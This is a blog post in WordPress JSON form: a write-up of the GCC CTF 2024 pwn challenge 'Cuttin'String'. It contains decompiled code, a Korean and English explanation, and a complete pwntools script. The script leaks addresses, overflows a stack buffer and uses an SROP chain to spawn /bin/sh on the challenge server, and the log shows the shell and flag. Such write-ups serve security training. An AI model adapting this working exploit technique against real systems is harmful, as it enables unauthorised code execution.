{"id":1700,"date":"2024-03-08T17:28:04","date_gmt":"2024-03-08T08:28:04","guid":{"rendered":"https:\/\/h4ck.kr\/?p=1700"},"modified":"2025-06-27T13:09:11","modified_gmt":"2025-06-27T04:09:11","slug":"gcc-ctf-2024-pwn-cuttinstring","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=1700","title":{"rendered":"GCC CTF 2024 \u2013 Pwn\/Cuttin&#8217;String"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"499\" height=\"613\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/03\/image-8.png\" alt=\"\" class=\"wp-image-1702\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/03\/image-8.png 499w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/03\/image-8-244x300.png 244w\" sizes=\"auto, (max-width: 499px) 100vw, 499px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Description<\/h2>\n\n\n\n<p>I made the lightest string cutting tool!<\/p>\n\n\n\n<p>Some people reported bugs, but anyway you can&#8217;t exploit them as there is no libc.<\/p>\n\n\n\n<p>Author:&nbsp;<a href=\"https:\/\/twitter.com\/50mgDrahoxx\" target=\"_blank\" rel=\"noreferrer noopener\">Drahoxx<\/a><\/p>\n\n\n\n<p><code>nc challenges1.gcc-ctf.com 4004<\/code><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">checksec<\/h2>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@seo:~\/Documents\/gcc_ctf_2024\/Cuttin_String$ checksec .\/chall\n[!] 
Did not find any GOT entries\n[*] '\/home\/seo\/Documents\/gcc_ctf_2024\/Cuttin_String\/chall'\n    Arch:     amd64-64-little\n    RELRO:    Full RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      PIE enabled<\/pre>\n<\/div>\n<\/div>\n\n\n\n<p>Reading these flags together: no stack canary means an overflow of a stack buffer can overwrite the saved return address directly; PIE means code and stack addresses must be leaked before they can be used; NX rules out running shellcode from the stack; and since the binary carries no libc (pwntools finds no GOT entries), there is no ret2libc target either. What remains is the <code>syscall<\/code> instruction inside the binary itself plus a gadget to set rax, which is exactly what the SROP chain below relies on.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Decompiled-src<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">start<\/h3>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">void __fastcall __noreturn start(__int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5, __int64 a6)\n{\n  int v6; \/\/ edx\n  int v7; \/\/ ecx\n  int v8; \/\/ r8d\n  int v9; \/\/ r9d\n\n  PUTS(\n    a1,\n    a2,\n    a3,\n    a4,\n    a5,\n    a6,\n    0LL,\n    (__int64)\"\\nCuttin'String, the smallest string cutting tool\\n-----------------------------------------------\\n\");\n  while ( 1 )\n    main_loop(a1, a2, v6, v7, v8, v9);\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n<h3 class=\"wp-block-heading\">main_loop<\/h3>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">__int64 __fastcall main_loop(__int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5, __int64 a6)\n{\n  __int64 v6; \/\/ rdx\n  __int64 v7; \/\/ rcx\n 
 __int64 v8; \/\/ r8\n  __int64 v9; \/\/ r9\n  __int64 v10; \/\/ rdx\n  __int64 v11; \/\/ rcx\n  __int64 v12; \/\/ r8\n  __int64 v13; \/\/ r9\n\n  PUTS(a1, a2, a3, a4, a5, a6, 0LL, (__int64)\"Enter the length of the string (in decimal) > \");\n  get_len_str();\n  PUTS(a1, a2, v6, v7, v8, v9, 0LL, (__int64)\"Enter the string to cut > \");\n  read_and_print_str();\n  return PUTS(a1, a2, v10, v11, v12, v13, 0LL, (__int64)\"\\n\\n---\\n\");\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n<h3 class=\"wp-block-heading\">get_len_str<\/h3>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">__int64 get_len_str()\n{\n  __int64 v0; \/\/ r8\n  __int64 v1; \/\/ r9\n  __int64 v2; \/\/ r10\n  __int64 i; \/\/ rcx\n  __int64 result; \/\/ rax\n  signed __int64 v5; \/\/ rax\n  char v6[8]; \/\/ [rsp+0h] [rbp-8h] BYREF\n\n  _LOAD_SYS_READ();\n  __asm { syscall; LINUX - }\n  v2 = 0LL;\n  for ( i = 0LL; i != 8; ++i )\n  {\n    result = (unsigned __int8)v6[i];\n    if ( !(_BYTE)result || (_BYTE)result == 10 )\n      break;\n    if ( (unsigned __int8)result &lt; 0x30u || (unsigned __int8)result > 0x39u )\n    {\n      PUTS(0LL, (__int64)v6, 8LL, i, v0, v1, 0LL, (__int64)\"Error. 
Enter a number in decimal.\\n\");\n      v5 = sys_exit(0);\n    }\n    if ( i )\n      v2 *= 10LL;\n    result -= 48LL;\n    v2 += result;\n  }\n  return result;\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n<h3 class=\"wp-block-heading\">_LOAD_SYS_WRITE<\/h3>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ disas __LOAD_SYS_WRITE\nDump of assembler code for function __LOAD_SYS_WRITE:\n   0x0000555555555004 &lt;+0>:     xor    rax,rax\n   0x0000555555555007 &lt;+3>:     mov    edi,0x1\n   0x000055555555500c &lt;+8>:     inc    al\n   0x000055555555500e &lt;+10>:    ret\nEnd of assembler dump.<\/pre>\n<\/div>\n<\/div>\n\n\n\n<h3 class=\"wp-block-heading\">_LOAD_SYS_READ<\/h3>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"asm\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gdb-peda$ disas __LOAD_SYS_READ\nDump of assembler code for function __LOAD_SYS_READ:\n   0x0000555555555000 &lt;+0>:     xor    rax,rax\n   0x0000555555555003 &lt;+3>:     ret\nEnd of assembler dump.<\/pre>\n<\/div>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading\">read_and_print_str<\/h2>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 
wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">__int64 read_and_print_str()\n{\n  __int64 v0; \/\/ rcx\n  __int64 v1; \/\/ r8\n  __int64 v2; \/\/ r9\n  __int64 v3; \/\/ r10\n  _BYTE v5[512]; \/\/ [rsp+0h] [rbp-200h] BYREF\n\n  _LOAD_SYS_READ();\n  __asm { syscall; LINUX - }\n  return PUTS(0LL, (__int64)v5, 1298LL, v0, v1, v2, v3, (__int64)v5);\n}<\/pre>\n<\/div>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Solution<\/h2>\n\n\n\n<ol class=\"wp-block-list\">\n<li>get_len_str \ud568\uc218\uc5d0\uc11c \uc785\ub825\ubc1b\uc744 \uae38\uc774\ub97c 500\uc774\uc0c1\uc73c\ub85c \ud574\uc11c, \uc2a4\ud0dd\uc758 \uc784\uc758\uc8fc\uc18c\ub97c \ub178\ucd9c\uc2dc\ucf1c read_and_print_str\uc5d0\uc11c\uc758 v5 \uc2a4\ud0dd \uc8fc\uc18c\ub97c \uacc4\uc0b0\ud55c\ub2e4. \ub610, chall \ubc14\uc774\ub108\ub9ac\uc758 text base \uc8fc\uc18c \ub610\ud55c \uad6c\ud560 \uc218 \uc788\ub2e4.<\/li>\n\n\n\n<li>read_and_print_str \ud568\uc218\ub97c \ud1b5\ud574 \ubc84\ud37c \uc624\ubc84\ud50c\ub85c\uc6b0\ub97c \ubc1c\uc0dd\uc2dc\ucf1c srop\uc73c\ub85c \uc258\uc744 \ud68d\ub4dd\ud558\uba74 \ub41c\ub2e4.<br>read_and_print_str\uc758 v5\uc5d0 \uc800\uc7a5\ub420 \ubc84\ud37c\uc5d0\ub294 &#8220;\/bin\/sh\\x00&#8221; \ubb38\uc790\uc5f4\uc744 \ucc44\uc6b0\uace0, srop \ud398\uc774\ub85c\ub4dc\ub97c \ud1b5\ud574 rip\uac00 \uc774\ub3d9\ub418\uac8c\ub054 \ub9cc\ub4e4\uba74 \ub41c\ub2e4. 
\uc774\ub3d9\ub418\uae30\uc804\uc5d0 rax\uac00 SYS_rt_sigreturn \uc2dc\uc2a4\ud15c\ucf5c \ubc88\ud638\uc778 15\uc5ec\uc57c \ud558\ub294\ub370, \uc774\ub294 _LOAD_SYS_WRITE\uc5d0 \uc788\ub294 \uc5b4\uc148\ube14\ub9ac \ucf54\ub4dc\uc778 <code>inc al<\/code>\uc744 \uc774\uc6a9\ud558\uba74 \ub41c\ub2e4. In other words, NX and the absence of libc do not stop this: the binary itself provides a <code>syscall<\/code> instruction and, through __LOAD_SYS_WRITE (<code>xor rax,rax; mov edi,1; inc al; ret<\/code>), a way to set rax, so a single rt_sigreturn loads every register from the forged frame and lands on execve(\/bin\/sh, 0, 0) without any libc. The chain enters __LOAD_SYS_WRITE once (rax = 1) and then returns into its <code>inc al<\/code> 14 more times to reach 15. Note that the <code>mov edi, 1<\/code> in that stub clobbers rdi on every pass; this is harmless only because the sigreturn frame reloads rdi with the leaked address of the \/bin\/sh string, while rsi and rdx stay at the frame&#8217;s zero defaults.<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">solve.py<\/h2>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">from pwn import *\n#context.log_level = 'debug'\ncontext(arch='amd64', os='linux')\nwarnings.filterwarnings('ignore')\n\n#p = process(\".\/chall\")\np = remote(\"challenges1.gcc-ctf.com\", 4004)\ne = ELF('.\/chall')\n\np.sendlineafter(\"Enter the length of the string (in decimal) > \", \"500\")\np.sendlineafter(\"Enter the string to cut > \", \"0\")\n\np.recv(0xb8)\npht_entry_0 = u64(p.recv(8))\nprint(f\"pht_entry: {hex(pht_entry_0)}\")\nchall_base = pht_entry_0 - 0x40\nprint(f\"chall_base: {hex(chall_base)}\")\np.recv(120)\nunk = u64(p.recv(8))\nprint(f\"unk? {hex(unk)}\")\nbin_sh_address = unk - (0x208) #-0x4e1\n#bin_sh_address = unk  - (0x4e1 - 0x8*35 - 11)\nprint(f\"bin_sh_address? 
{hex(bin_sh_address)}\")\n\np.sendlineafter(\"Enter the length of the string (in decimal) > \", \"0\")\n\nbin_sh = b\"\/bin\/sh\\x00\"*50\npayload = b''\npayload += bin_sh + b'\\x41'*(512-len(bin_sh))\npayload += b\"A\"*8\nsyscall = chall_base + 0x1034\n\n# Make rax to SYS_rt_sigreturn, 15\npayload += p64(chall_base + e.symbols['__LOAD_SYS_WRITE'])\nfor i in range(15-1):\n    payload += p64(chall_base + e.symbols['__LOAD_SYS_WRITE'] + 0x8)\n#syscall\npayload += p64(syscall)\n# execve(\"\/bin\/sh\", 0, 0)\nframe2 = SigreturnFrame()\nframe2.rip = syscall\nframe2.rax = 0x3b # execve\nframe2.rsp = chall_base + 0x3fb0\nframe2.rdi = bin_sh_address\npayload += bytes(frame2)\npayload += bin_sh\n\n#pause()\np.sendlineafter(\"Enter the string to cut > \", payload)\n\n#pause()\n\np.interactive()<\/pre>\n<\/div>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading\">Result<\/h2>\n\n\n\n<div class=\"wp-block-columns is-layout-flex wp-container-core-columns-is-layout-9d6595d7 wp-block-columns-is-layout-flex\">\n<div class=\"wp-block-column is-layout-flow wp-block-column-is-layout-flow\" style=\"flex-basis:100%\">\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@seo:~\/Documents\/gcc_ctf_2024\/Cuttin_String$ python3 solve.py\n[+] Opening connection to challenges1.gcc-ctf.com on port 4004: Done\n[!] Did not find any GOT entries\n[*] '\/home\/seo\/Documents\/gcc_ctf_2024\/Cuttin_String\/chall'\n    Arch:     amd64-64-little\n    RELRO:    Full RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      PIE enabled\npht_entry: 0x5629a4e6a040\nchall_base: 0x5629a4e6a000\nunk? 0x7ffdf0bd11f0\nbin_sh_address? 
0x7ffdf0bd0fe8\n[*] Switching to interactive mode\n$ ls\nflag.txt\npwn\n$ cat flag.txt\nGCC{SR0p_1s_f0r_Sup3r_R0P_Right?}\n$\n[*] Interrupted\n[*] Closed connection to challenges1.gcc-ctf.com port 4004<\/pre>\n<\/div>\n<\/div>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"529\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/03\/image-7-1024x529.png\" alt=\"\" class=\"wp-image-1701\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/03\/image-7-1024x529.png 1024w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/03\/image-7-300x155.png 300w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/03\/image-7-768x397.png 768w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/03\/image-7-1536x794.png 1536w, https:\/\/h4ck.kr\/wp-content\/uploads\/2024\/03\/image-7.png 1915w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">FLAG<\/h2>\n\n\n\n<p><strong>GCC{SR0p_1s_f0r_Sup3r_R0P_Right?}<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Description I made the lightest string cutting tool! Some people reported bugs, but anyway you can&#8217;t exploit them as there is no libc. 
Author:&nbsp;Drahoxx nc challenges1.gcc-ctf.com 4004 checksec Decompiled-src start main_loop get_len_str _LOAD_SYS_WRITE _LOAD_SYS_READ read_and_print_str Solution solve.py Result FLAG GCC{SR0p_1s_f0r_Sup3r_R0P_Right?}<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[19],"tags":[25,31,71],"class_list":["post-1700","post","type-post","status-publish","format-standard","hentry","category-ctf-private","tag-pwnable","tag-rop","tag-srop"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1700","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1700"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1700\/revisions"}],"predecessor-version":[{"id":1703,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/1700\/revisions\/1703"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1700"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1700"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1700"}],"curies":[{"name":"wp","href":"https
:\/\/api.w.org\/{rel}","templated":true}]}}